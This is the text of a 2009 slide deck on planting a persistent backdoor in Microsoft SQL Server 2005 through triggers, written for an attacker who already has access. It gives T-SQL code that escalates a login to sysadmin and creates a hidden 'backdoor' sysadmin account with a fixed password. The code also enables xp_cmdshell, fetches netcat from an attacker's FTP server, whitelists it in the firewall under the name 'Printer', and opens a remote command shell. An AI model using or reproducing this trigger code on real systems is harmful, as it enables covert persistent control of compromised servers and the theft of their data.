MSSql server 2005 backdoor

Duong Ngo October 14, 2009

POST-EXPLOITATION

Got access to a MSSQL box? (SQL injection, brute force…)

Privileges: sa / dbo / normal user

Got all data

Now what’s next??

Backdoors

Provide easier access to the compromised box in the future

Type of backdoors: OS backdoors (rootkits), Web server backdoor ( PHPshell,

CGITelnet..)

So how’s about Database Backdoor?? YES!

SQL Server 2005 Backdoor

We’ll create a backdoor based on SQLServer Trigger.

What’s Trigger?

Database Trigger

Special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..)

Trigger gets executed under the security context of who caused trigger to fire!

EXAMPLE – Create trigger

Context: Normal User with Create Trigger permission:

CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR INSERT, DELETE,UPDATE

AS

EXEC sp_addsrvrolemember @loginame ='Hacker', @rolename = N'sysadmin‘

EXAMPLE – Trigger got fired Context: sa (server admin) sa> DELETE * FROM tblCustomers

RESULT??User: “Hacker” now become sysadmin

What can we do with that? Privilege escalation: normal user ->

higher role

Database backdoor

SQLServer Backdoor features: - Execute subsequent commands if current user is 'sa‘

- Enable xp_cmdshell - Create new login 'backdoor' and add it to sysadmin

server role. - Disable firewall notification mode - Add ftp to allowed programs list - Get netcat from attacker ftp server - Create a directory 'Backdoor_activated' in attacker

ftp server to let attacker knows whenever the backdoor has been started.

- Open netcat in listen mode attached with sql command line client Osql.

Our Backdoor’s Code

CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS

ASBEGINDECLARE @cur_user varchar(200)……CREATE LOGIN [backdoor] WITH PASSWORD =

'Backdoor123#' ; EXEC sys.sp_addsrvrolemember @loginame =

N'Backdoor', @rolename =N'sysadmin'--disable firewall notification modeExec master..xp_cmdshell 'netsh firewall set notifications

disable‘…..

Why DL_DATABASE_LEVEL_EVENTS Because it consists of all below events:

CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW

CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION

CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER

DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION

….….

Our Backdoor’s Code (cont)-- save ftp commands to an external file

SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile

…..

-- execute ftp with commands loaded from the file we created

SET @cmd = 'ftp -s:' + @cmdfileEXEC master..xp_cmdshell @cmd, NO_OUTPUT……

-- After get netcat, add netcat to firewall’s allowedprogram list

SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\'+ @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'

Thank You for listening!!